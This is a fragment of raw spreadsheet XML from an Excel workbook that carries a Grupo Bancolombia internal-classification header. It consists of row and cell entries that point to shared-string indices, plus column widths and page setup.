      <c r="E82" t="s">
        <v>2533</v>
      </c>
      <c r="H82" t="s">
        <v>2441</v>
      </c>
      <c r="I82" t="s">
        <v>2460</v>
      </c>
      <c r="Q82" t="s">
        <v>161</v>
      </c>
      <c r="W82" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="83" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A83" t="s">
        <v>5</v>
      </c>
      <c r="E83" t="s">
        <v>2534</v>
      </c>
      <c r="H83" t="s">
        <v>2441</v>
      </c>
      <c r="I83" t="s">
        <v>210</v>
      </c>
      <c r="Q83" t="s">
        <v>161</v>
      </c>
      <c r="W83" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="84" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A84" t="s">
        <v>5</v>
      </c>
      <c r="E84" t="s">
        <v>2535</v>
      </c>
      <c r="H84" t="s">
        <v>2441</v>
      </c>
      <c r="I84" t="s">
        <v>210</v>
      </c>
      <c r="Q84" t="s">
        <v>161</v>
      </c>
      <c r="W84" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="85" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A85" t="s">
        <v>5</v>
      </c>
      <c r="E85" t="s">
        <v>2536</v>
      </c>
      <c r="H85" t="s">
        <v>2441</v>
      </c>
      <c r="I85" t="s">
        <v>210</v>
      </c>
      <c r="Q85" t="s">
        <v>161</v>
      </c>
      <c r="W85" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="86" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A86" t="s">
        <v>5</v>
      </c>
      <c r="E86" t="s">
        <v>3474</v>
      </c>
      <c r="H86" t="s">
        <v>3475</v>
      </c>
      <c r="I86" t="s">
        <v>2442</v>
      </c>
      <c r="Q86" t="s">
        <v>161</v>
      </c>
      <c r="W86" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="87" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A87" t="s">
        <v>5</v>
      </c>
      <c r="E87" t="s">
        <v>3476</v>
      </c>
      <c r="H87" t="s">
        <v>3475</v>
      </c>
      <c r="I87" t="s">
        <v>2442</v>
      </c>
      <c r="Q87" t="s">
        <v>161</v>
      </c>
      <c r="W87" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="88" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A88" t="s">
        <v>5</v>
      </c>
      <c r="E88" t="s">
        <v>3477</v>
      </c>
      <c r="H88" t="s">
        <v>3475</v>
      </c>
      <c r="I88" t="s">
        <v>2442</v>
      </c>
      <c r="Q88" t="s">
        <v>161</v>
      </c>
      <c r="W88" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="89" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A89" t="s">
        <v>5</v>
      </c>
      <c r="E89" t="s">
        <v>3478</v>
      </c>
      <c r="H89" t="s">
        <v>3475</v>
      </c>
      <c r="I89" t="s">
        <v>2442</v>
      </c>
      <c r="Q89" t="s">
        <v>161</v>
      </c>
      <c r="W89" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="90" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A90" t="s">
        <v>5</v>
      </c>
      <c r="E90" t="s">
        <v>3479</v>
      </c>
      <c r="H90" t="s">
        <v>3475</v>
      </c>
      <c r="I90" t="s">
        <v>2442</v>
      </c>
      <c r="Q90" t="s">
        <v>161</v>
      </c>
      <c r="W90" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="91" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A91" t="s">
        <v>5</v>
      </c>
      <c r="E91" t="s">
        <v>3480</v>
      </c>
      <c r="H91" t="s">
        <v>3475</v>
      </c>
      <c r="I91" t="s">
        <v>2451</v>
      </c>
      <c r="Q91" t="s">
        <v>161</v>
      </c>
      <c r="W91" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="92" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A92" t="s">
        <v>5</v>
      </c>
      <c r="E92" t="s">
        <v>3481</v>
      </c>
      <c r="H92" t="s">
        <v>3475</v>
      </c>
      <c r="I92" t="s">
        <v>210</v>
      </c>
      <c r="Q92" t="s">
        <v>161</v>
      </c>
      <c r="W92" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="93" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A93" t="s">
        <v>5</v>
      </c>
      <c r="E93" t="s">
        <v>3482</v>
      </c>
      <c r="H93" t="s">
        <v>2441</v>
      </c>
      <c r="I93" t="s">
        <v>2460</v>
      </c>
      <c r="Q93" t="s">
        <v>161</v>
      </c>
      <c r="W93" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="94" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A94" t="s">
        <v>5</v>
      </c>
      <c r="E94" t="s">
        <v>3483</v>
      </c>
      <c r="H94" t="s">
        <v>2441</v>
      </c>
      <c r="I94" t="s">
        <v>2460</v>
      </c>
      <c r="Q94" t="s">
        <v>161</v>
      </c>
      <c r="W94" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="95" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A95" t="s">
        <v>5</v>
      </c>
      <c r="E95" t="s">
        <v>3484</v>
      </c>
      <c r="H95" t="s">
        <v>2441</v>
      </c>
      <c r="I95" t="s">
        <v>2460</v>
      </c>
      <c r="Q95" t="s">
        <v>161</v>
      </c>
      <c r="W95" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="96" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A96" t="s">
        <v>5</v>
      </c>
      <c r="E96" t="s">
        <v>3485</v>
      </c>
      <c r="H96" t="s">
        <v>2441</v>
      </c>
      <c r="I96" t="s">
        <v>2460</v>
      </c>
      <c r="Q96" t="s">
        <v>161</v>
      </c>
      <c r="W96" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="97" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A97" t="s">
        <v>5</v>
      </c>
      <c r="E97" t="s">
        <v>3486</v>
      </c>
      <c r="H97" t="s">
        <v>2441</v>
      </c>
      <c r="I97" t="s">
        <v>2460</v>
      </c>
      <c r="Q97" t="s">
        <v>161</v>
      </c>
      <c r="W97" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="98" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A98" t="s">
        <v>5</v>
      </c>
      <c r="E98" t="s">
        <v>3487</v>
      </c>
      <c r="H98" t="s">
        <v>2441</v>
      </c>
      <c r="I98" t="s">
        <v>2460</v>
      </c>
      <c r="Q98" t="s">
        <v>161</v>
      </c>
      <c r="W98" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="99" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A99" t="s">
        <v>5</v>
      </c>
      <c r="E99" t="s">
        <v>3488</v>
      </c>
      <c r="H99" t="s">
        <v>2441</v>
      </c>
      <c r="I99" t="s">
        <v>2460</v>
      </c>
      <c r="Q99" t="s">
        <v>161</v>
      </c>
      <c r="W99" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="100" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A100" t="s">
        <v>5</v>
      </c>
      <c r="E100" t="s">
        <v>3489</v>
      </c>
      <c r="H100" t="s">
        <v>3475</v>
      </c>
      <c r="I100" t="s">
        <v>2451</v>
      </c>
      <c r="Q100" t="s">
        <v>161</v>
      </c>
      <c r="W100" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="101" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A101" t="s">
        <v>5</v>
      </c>
      <c r="E101" t="s">
        <v>3490</v>
      </c>
      <c r="H101" t="s">
        <v>3475</v>
      </c>
      <c r="I101" t="s">
        <v>2442</v>
      </c>
      <c r="Q101" t="s">
        <v>161</v>
      </c>
      <c r="W101" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="102" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A102" t="s">
        <v>5</v>
      </c>
      <c r="E102" t="s">
        <v>3491</v>
      </c>
      <c r="H102" t="s">
        <v>3475</v>
      </c>
      <c r="I102" t="s">
        <v>2442</v>
      </c>
      <c r="Q102" t="s">
        <v>161</v>
      </c>
      <c r="W102" t="s">
        <v>2443</v>
      </c>
    </row>
  </sheetData>
  <phoneticPr fontId="10" type="noConversion"/>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
  <headerFooter>
    <oddHeader>&amp;L&amp;"Calibri"&amp;10&amp;K000000Grupo Bancolombia Clasificación – Interna&amp;1#&amp;C&amp;G</oddHeader>
  </headerFooter>
  <legacyDrawingHF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F7696-6F7A-423E-8EF0-A69636F24180}">
  <sheetPr codeName="Hoja6"/>
  <dimension ref="A1:W441"/>
  <sheetViews>
    <sheetView workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11.453125" defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="1" max="1" width="8" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="8.453125" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="19.08984375" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="18.6328125" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="46.6328125" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="6.6328125" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="21.36328125" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="81.08984375" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="48.90625" bestFit="1" customWidth="1"/>
    <col min="10" max="10" width="27.90625" bestFit="1" customWidth="1"/>
    <col min="11" max="11" width="40.36328125" bestFit="1" customWidth="1"/>
    <col min="12" max="12" width="20.36328125" bestFit="1" customWidth="1"/>
    <col min="13" max="13" width="38.6328125" bestFit="1" customWidth="1"/>
    <col min="14" max="14" width="49.90625" bestFit="1" customWidth="1"/>
    <col min="15" max="15" width="22.90625" bestFit="1" customWidth="1"/>
    <col min="16" max="17" width="81.08984375" customWidth="1"/>
    <col min="18" max="18" width="8.90625" bestFit="1" customWidth="1"/>
    <col min="19" max="19" width="7.54296875" bestFit="1" customWidth="1"/>
    <col min="20" max="20" width="8.36328125" bestFit="1" customWidth="1"/>
    <col min="21" max="21" width="8" bestFit="1" customWidth="1"/>
    <col min="22" max="22" width="7.453125" bestFit="1" customWidth="1"/>
    <col min="23" max="23" width="13.90625" customWidth="1"/>
    <col min="24" max="24" width="19.90625" bestFit="1" customWidth="1"/>
    <col min="25" max="25" width="19.54296875" bestFit="1" customWidth="1"/>
    <col min="26" max="27" width="13.90625" customWidth="1"/>
    <col min="28" max="29" width="13.90625" bestFit="1" customWidth="1"/>
    <col min="30" max="30" width="13.90625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1" t="s">
        <v>1</v>
      </c>
      <c r="B1" t="s">
        <v>51</v>
      </c>
      <c r="C1" t="s">
        <v>52</v>
      </c>
      <c r="D1" t="s">
        <v>53</v>
      </c>
      <c r="E1" t="s">
        <v>54</v>
      </c>
      <c r="F1" t="s">
        <v>55</v>
      </c>
      <c r="G1" t="s">
        <v>56</v>
      </c>
      <c r="H1" t="s">
        <v>57</v>
      </c>
      <c r="I1" t="s">
        <v>58</v>
      </c>
      <c r="J1" t="s">
        <v>59</v>
      </c>
      <c r="K1" t="s">
        <v>8</v>
      </c>
      <c r="L1" t="s">
        <v>60</v>
      </c>
      <c r="M1" t="s">
        <v>61</v>
      </c>
      <c r="N1" t="s">
        <v>62</v>
      </c>
      <c r="O1" t="s">
        <v>63</v>
      </c>
      <c r="P1" t="s">
        <v>64</v>
      </c>
      <c r="Q1" t="s">
        <v>65</v>
      </c>
      <c r="R1" t="s">
        <v>66</v>
      </c>
      <c r="S1" t="s">
        <v>67</v>
      </c>
      <c r="T1" t="s">
        <v>68</v>
      </c>
      <c r="U1" t="s">
        <v>69</v>
      </c>
      <c r="V1" t="s">
        <v>70</v>
      </c>
      <c r="W1" t="s">
        <v>71</v>
      </c>
    </row>
    <row r="2" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A2" t="s">
        <v>5</v>
      </c>
      <c r="C2" t="s">
        <v>72</v>
      </c>
      <c r="D2" t="s">
        <v>72</v>
      </c>
      <c r="E2" t="s">
        <v>73</v>
      </c>
      <c r="F2">
        <v>300</v>
      </c>
      <c r="G2" t="s">
        <v>72</v>
      </c>
      <c r="H2" t="s">
        <v>74</v>
      </c>
      <c r="I2" t="s">
        <v>75</v>
      </c>
      <c r="J2" t="s">
        <v>76</v>
      </c>
      <c r="K2" t="s">
        <v>19</v>
      </c>
      <c r="L2" t="s">
        <v>77</v>
      </c>
      <c r="M2" t="s">
        <v>76</v>
      </c>
      <c r="P2" t="s">
        <v>78</v>
      </c>
      <c r="Q2" t="s">
        <v>3683</v>
      </c>
      <c r="W2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="3" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A3" t="s">
        <v>5</v>
      </c>
      <c r="C3" t="s">
        <v>72</v>
      </c>
      <c r="D3" t="s">
        <v>72</v>
      </c>
      <c r="E3" t="s">
        <v>80</v>
      </c>
      <c r="F3">
        <v>100</v>
      </c>
      <c r="G3" t="s">
        <v>72</v>
      </c>
      <c r="H3" t="s">
        <v>81</v>
      </c>
      <c r="I3" t="s">
        <v>82</v>
      </c>
      <c r="J3" t="s">
        <v>32</v>
      </c>
      <c r="K3" t="s">
        <v>32</v>
      </c>
      <c r="L3" t="s">
        <v>83</v>
      </c>
      <c r="M3" t="s">
        <v>72</v>
      </c>
      <c r="P3" t="s">
        <v>84</v>
      </c>
      <c r="Q3" t="s">
        <v>3684</v>
      </c>
      <c r="W3" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="4" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A4" t="s">
        <v>5</v>
      </c>
      <c r="C4" t="s">
        <v>72</v>
      </c>
      <c r="D4" t="s">
        <v>72</v>
      </c>
      <c r="E4" t="s">
        <v>162</v>
      </c>
      <c r="F4">
        <v>100</v>
      </c>
      <c r="G4" t="s">
        <v>72</v>
      </c>
      <c r="H4" t="s">
        <v>163</v>
      </c>
      <c r="I4" t="s">
        <v>75</v>
      </c>
      <c r="J4" t="s">
        <v>76</v>
      </c>
      <c r="K4" t="s">
        <v>19</v>
      </c>
      <c r="L4" t="s">
        <v>77</v>
      </c>
      <c r="M4" t="s">
        <v>76</v>
      </c>
      <c r="P4" t="s">
        <v>78</v>
      </c>
      <c r="Q4" t="s">
        <v>3685</v>
      </c>
      <c r="W4" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="5" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A5" t="s">
        <v>5</v>
      </c>
      <c r="C5" t="s">
        <v>72</v>
      </c>
      <c r="D5" t="s">
        <v>72</v>
      </c>
      <c r="E5" t="s">
        <v>165</v>
      </c>
      <c r="F5">
        <v>100</v>
      </c>
      <c r="G5" t="s">
        <v>72</v>
      </c>
      <c r="H5" t="s">
        <v>166</v>
      </c>
      <c r="I5" t="s">
        <v>75</v>
      </c>
      <c r="J5" t="s">
        <v>76</v>
      </c>
      <c r="K5" t="s">
        <v>15</v>
      </c>
      <c r="L5" t="s">
        <v>83</v>
      </c>
      <c r="M5" t="s">
        <v>90</v>
      </c>
      <c r="N5" t="s">
        <v>167</v>
      </c>
      <c r="P5" t="s">
        <v>168</v>
      </c>
      <c r="Q5" t="s">
        <v>3686</v>
      </c>
      <c r="W5" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="6" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A6" t="s">
        <v>5</v>
      </c>
      <c r="C6" t="s">
        <v>72</v>
      </c>
      <c r="D6" t="s">
        <v>72</v>
      </c>
      <c r="E6" t="s">
        <v>170</v>
      </c>
      <c r="F6">
        <v>100</v>
      </c>
      <c r="G6" t="s">
        <v>72</v>
      </c>
      <c r="H6" t="s">
        <v>171</v>
      </c>
      <c r="I6" t="s">
        <v>172</v>
      </c>
      <c r="J6" t="s">
        <v>173</v>
      </c>
      <c r="K6" t="s">
        <v>13</v>
      </c>
      <c r="L6" t="s">
        <v>83</v>
      </c>
      <c r="M6" t="s">
        <v>72</v>
      </c>
      <c r="N6" t="s">
        <v>174</v>
      </c>
      <c r="P6" t="s">
        <v>175</v>
      </c>
      <c r="Q6" t="s">
        <v>176</v>
      </c>
      <c r="W6" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="7" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A7" t="s">
        <v>5</v>
      </c>
      <c r="C7" t="s">
        <v>72</v>
      </c>
      <c r="D7" t="s">
        <v>72</v>
      </c>
      <c r="E7" t="s">
        <v>177</v>
      </c>
      <c r="F7">
        <v>100</v>
      </c>
      <c r="G7" t="s">
        <v>72</v>
      </c>
      <c r="H7" t="s">
        <v>178</v>
      </c>
      <c r="I7" t="s">
        <v>179</v>
      </c>
      <c r="J7" t="s">
        <v>180</v>
      </c>
      <c r="K7" t="s">
        <v>19</v>
      </c>
      <c r="L7" t="s">
        <v>77</v>
      </c>
      <c r="P7" t="s">
        <v>181</v>
      </c>
      <c r="Q7" t="s">
        <v>3687</v>
      </c>
      <c r="W7" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="8" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A8" t="s">
        <v>5</v>
      </c>
      <c r="C8" t="s">
        <v>72</v>
      </c>
      <c r="D8" t="s">
        <v>72</v>
      </c>
      <c r="E8" t="s">
        <v>183</v>
      </c>
      <c r="F8">
        <v>100</v>
      </c>
      <c r="G8" t="s">
        <v>72</v>
      </c>
      <c r="H8" t="s">
        <v>184</v>
      </c>
      <c r="I8" t="s">
        <v>185</v>
      </c>
      <c r="J8" t="s">
        <v>186</v>
      </c>
      <c r="K8" t="s">
        <v>16</v>
      </c>
      <c r="L8" t="s">
        <v>83</v>
      </c>
      <c r="M8" t="s">
        <v>72</v>
      </c>
      <c r="P8" t="s">
        <v>187</v>
      </c>
      <c r="Q8" t="s">
        <v>188</v>
      </c>
      <c r="W8" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="9" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A9" t="s">
        <v>5</v>
      </c>
      <c r="C9" t="s">
        <v>72</v>
      </c>
      <c r="D9" t="s">
        <v>72</v>
      </c>
      <c r="E9" t="s">
        <v>189</v>
      </c>
      <c r="F9">
        <v>100</v>
      </c>
      <c r="G9" t="s">
        <v>72</v>
      </c>
      <c r="H9" t="s">
        <v>190</v>
      </c>
      <c r="I9" t="s">
        <v>172</v>
      </c>
      <c r="J9" t="s">
        <v>173</v>
      </c>
      <c r="K9" t="s">
        <v>13</v>
      </c>
      <c r="L9" t="s">
        <v>83</v>
      </c>
      <c r="M9" t="s">
        <v>72</v>
      </c>
      <c r="N9" t="s">
        <v>174</v>
      </c>
      <c r="Q9" t="s">
        <v>191</v>
      </c>
      <c r="W9" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="10" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A10" t="s">
        <v>5</v>
      </c>
      <c r="C10" t="s">
        <v>72</v>
      </c>
      <c r="D10" t="s">
        <v>72</v>
      </c>
      <c r="E10" t="s">
        <v>192</v>
      </c>
      <c r="F10">
        <v>100</v>
      </c>
      <c r="G10" t="s">
        <v>72</v>
      </c>
      <c r="H10" t="s">
        <v>193</v>
      </c>
      <c r="I10" t="s">
        <v>75</v>
      </c>
      <c r="J10" t="s">
        <v>76</v>
      </c>
      <c r="K10" t="s">
        <v>15</v>
      </c>
      <c r="L10" t="s">
        <v>83</v>
      </c>
      <c r="M10" t="s">
        <v>90</v>
      </c>
      <c r="N10" t="s">
        <v>167</v>
      </c>
      <c r="P10" t="s">
        <v>168</v>
      </c>
      <c r="Q10" t="s">
        <v>3688</v>
      </c>
      <c r="W10" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="11" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A11" t="s">
        <v>5</v>
      </c>
      <c r="C11" t="s">
        <v>72</v>
      </c>
      <c r="D11" t="s">
        <v>72</v>
      </c>
      <c r="E11" t="s">
        <v>195</v>
      </c>
      <c r="F11">
        <v>100</v>
      </c>
      <c r="G11" t="s">
        <v>72</v>
      </c>
      <c r="H11" t="s">
        <v>195</v>
      </c>
      <c r="I11" t="s">
        <v>196</v>
      </c>
      <c r="J11" t="s">
        <v>197</v>
      </c>
      <c r="K11" t="s">
        <v>18</v>
      </c>
      <c r="L11" t="s">
        <v>77</v>
      </c>
      <c r="M11" t="s">
        <v>18</v>
      </c>
      <c r="N11" t="s">
        <v>198</v>
      </c>
      <c r="Q11" t="s">
        <v>176</v>
      </c>
      <c r="W11" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="12" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A12" t="s">
        <v>5</v>
      </c>
      <c r="C12" t="s">
        <v>72</v>
      </c>
      <c r="D12" t="s">
        <v>72</v>
      </c>
      <c r="E12" t="s">
        <v>209</v>
      </c>
      <c r="F12">
        <v>100</v>
      </c>
      <c r="G12" t="s">
        <v>72</v>
      </c>
      <c r="H12" t="s">
        <v>209</v>
      </c>
      <c r="I12" t="s">
        <v>210</v>
      </c>
      <c r="J12" t="s">
        <v>211</v>
      </c>
      <c r="K12" t="s">
        <v>30</v>
      </c>
      <c r="L12" t="s">
        <v>83</v>
      </c>
      <c r="M12" t="s">
        <v>72</v>
      </c>
      <c r="Q12" t="s">
        <v>176</v>
      </c>
      <c r="W12" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="13" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A13" t="s">
        <v>5</v>
      </c>
      <c r="C13" t="s">
        <v>72</v>
      </c>
      <c r="D13" t="s">
        <v>72</v>
      </c>
      <c r="E13" t="s">
        <v>212</v>
      </c>
      <c r="F13">
        <v>100</v>
      </c>
      <c r="G13" t="s">
        <v>72</v>
      </c>
      <c r="H13" t="s">
        <v>213</v>
      </c>
      <c r="I13" t="s">
        <v>75</v>
      </c>
      <c r="J13" t="s">
        <v>76</v>
      </c>
      <c r="K13" t="s">
        <v>15</v>
      </c>
      <c r="L13" t="s">
        <v>83</v>
      </c>
      <c r="M13" t="s">
        <v>90</v>
      </c>
      <c r="N13" t="s">
        <v>167</v>
      </c>
      <c r="P13" t="s">
        <v>214</v>
      </c>
      <c r="Q13" t="s">
        <v>3689</v>
      </c>
      <c r="W13" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="14" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A14" t="s">
        <v>5</v>
      </c>
      <c r="C14" t="s">
        <v>72</v>
      </c>
      <c r="D14" t="s">
        <v>72</v>
      </c>
      <c r="E14" t="s">
        <v>216</v>
      </c>
      <c r="F14">
        <v>100</v>
      </c>
      <c r="G14" t="s">
        <v>72</v>
      </c>
      <c r="H14" t="s">
        <v>217</v>
      </c>
      <c r="I14" t="s">
        <v>75</v>
      </c>
      <c r="J14" t="s">
        <v>76</v>
      </c>
      <c r="K14" t="s">
        <v>21</v>
      </c>
      <c r="L14" t="s">
        <v>77</v>
      </c>
      <c r="M14" t="s">
        <v>76</v>
      </c>
      <c r="Q14" t="s">
        <v>218</v>
      </c>
      <c r="W14" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="15" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A15" t="s">
        <v>5</v>
      </c>
      <c r="C15" t="s">
        <v>72</v>
      </c>
      <c r="D15" t="s">
        <v>72</v>
      </c>
      <c r="E15" t="s">
        <v>219</v>
      </c>
      <c r="F15">
        <v>100</v>
      </c>
      <c r="G15" t="s">
        <v>72</v>
      </c>
      <c r="H15" t="s">
        <v>220</v>
      </c>
      <c r="I15" t="s">
        <v>75</v>
      </c>
      <c r="J15" t="s">
        <v>76</v>
      </c>
      <c r="K15" t="s">
        <v>15</v>
      </c>
      <c r="L15" t="s">
        <v>83</v>
      </c>
      <c r="M15" t="s">
        <v>90</v>
      </c>
      <c r="N15" t="s">
        <v>221</v>
      </c>
      <c r="P15" t="s">
        <v>222</v>
      </c>
      <c r="Q15" t="s">
        <v>3690</v>
      </c>
      <c r="W15" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="16" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A16" t="s">
        <v>5</v>
      </c>
      <c r="C16" t="s">
        <v>72</v>
      </c>
      <c r="D16" t="s">
        <v>72</v>
      </c>
      <c r="E16" t="s">
        <v>224</v>
      </c>
      <c r="F16">
        <v>100</v>
      </c>
      <c r="G16" t="s">
        <v>72</v>
      </c>
      <c r="H16" t="s">
        <v>225</v>
      </c>
      <c r="I16" t="s">
        <v>156</v>
      </c>
      <c r="J16" t="s">
        <v>226</v>
      </c>
      <c r="K16" t="s">
        <v>27</v>
      </c>
      <c r="L16" t="s">
        <v>77</v>
      </c>
      <c r="M16" t="s">
        <v>227</v>
      </c>
      <c r="N16" t="s">
        <v>228</v>
      </c>
      <c r="Q16" t="s">
        <v>3691</v>
      </c>
      <c r="W16" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="17" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A17" t="s">
        <v>5</v>
      </c>
      <c r="C17" t="s">
        <v>72</v>
      </c>
      <c r="D17" t="s">
        <v>72</v>
      </c>
      <c r="E17" t="s">
        <v>230</v>
      </c>
      <c r="F17">
        <v>100</v>
      </c>
      <c r="G17" t="s">
        <v>72</v>
      </c>
      <c r="H17" t="s">
        <v>231</v>
      </c>
      <c r="I17" t="s">
        <v>196</v>
      </c>
      <c r="J17" t="s">
        <v>197</v>
      </c>
      <c r="K17" t="s">
        <v>18</v>
      </c>
      <c r="L17" t="s">
        <v>77</v>
      </c>
      <c r="M17" t="s">
        <v>18</v>
      </c>
      <c r="N17" t="s">
        <v>198</v>
      </c>
      <c r="P17" t="s">
        <v>232</v>
      </c>
      <c r="Q17" t="s">
        <v>3692</v>
      </c>
      <c r="W17" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="18" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A18" t="s">
        <v>5</v>
      </c>
      <c r="C18" t="s">
        <v>72</v>
      </c>
      <c r="D18" t="s">
        <v>72</v>
      </c>
      <c r="E18" t="s">
        <v>234</v>
      </c>
      <c r="F18">
        <v>100</v>
      </c>
      <c r="G18" t="s">
        <v>72</v>
      </c>
      <c r="H18" t="s">
        <v>235</v>
      </c>
      <c r="I18" t="s">
        <v>75</v>
      </c>
      <c r="J18" t="s">
        <v>236</v>
      </c>
      <c r="K18" t="s">
        <v>21</v>
      </c>
      <c r="L18" t="s">
        <v>77</v>
      </c>
      <c r="M18" t="s">
        <v>237</v>
      </c>
      <c r="N18" t="s">
        <v>238</v>
      </c>
      <c r="Q18" t="s">
        <v>3693</v>
      </c>
      <c r="W18" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="19" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A19" t="s">
        <v>5</v>
      </c>
      <c r="C19" t="s">
        <v>72</v>
      </c>
      <c r="D19" t="s">
        <v>72</v>
      </c>
      <c r="E19" t="s">
        <v>240</v>
      </c>
      <c r="F19">
        <v>100</v>
      </c>
      <c r="G19" t="s">
        <v>72</v>
      </c>
      <c r="H19" t="s">
        <v>241</v>
      </c>
      <c r="I19" t="s">
        <v>196</v>
      </c>
      <c r="J19" t="s">
        <v>197</v>
      </c>
      <c r="K19" t="s">
        <v>18</v>
      </c>
      <c r="L19" t="s">
        <v>77</v>
      </c>
      <c r="M19" t="s">
        <v>18</v>
      </c>
      <c r="N19" t="s">
        <v>198</v>
      </c>
      <c r="P19" t="s">
        <v>242</v>
      </c>
      <c r="Q19" t="s">
        <v>243</v>
      </c>
      <c r="W19" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="20" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A20" t="s">
        <v>5</v>
      </c>
      <c r="C20" t="s">
        <v>72</v>
      </c>
      <c r="D20" t="s">
        <v>72</v>
      </c>
      <c r="E20" t="s">
        <v>244</v>
      </c>
      <c r="F20">
        <v>300</v>
      </c>
      <c r="G20" t="s">
        <v>72</v>
      </c>
      <c r="H20" t="s">
        <v>245</v>
      </c>
      <c r="I20" t="s">
        <v>103</v>
      </c>
      <c r="J20" t="s">
        <v>104</v>
      </c>
      <c r="K20" t="s">
        <v>19</v>
      </c>
      <c r="L20" t="s">
        <v>77</v>
      </c>
      <c r="M20" t="s">
        <v>104</v>
      </c>
      <c r="P20" t="s">
        <v>246</v>
      </c>
      <c r="Q20" t="s">
        <v>247</v>
      </c>
      <c r="W20" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="21" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A21" t="s">
        <v>5</v>
      </c>
      <c r="C21" t="s">
        <v>72</v>
      </c>
      <c r="D21" t="s">
        <v>72</v>
      </c>
      <c r="E21" t="s">
        <v>248</v>
      </c>
      <c r="F21">
        <v>100</v>
      </c>
      <c r="G21" t="s">
        <v>72</v>
      </c>
      <c r="H21" t="s">
        <v>249</v>
      </c>
      <c r="K21" t="s">
        <v>38</v>
      </c>
      <c r="L21" t="s">
        <v>38</v>
      </c>
      <c r="M21" t="s">
        <v>38</v>
      </c>
      <c r="N21" t="s">
        <v>38</v>
      </c>
      <c r="P21" t="s">
        <v>250</v>
      </c>
      <c r="Q21" t="s">
        <v>3694</v>
      </c>
      <c r="W21" t="s">
        <v>5</v>
      </c>
    </row>
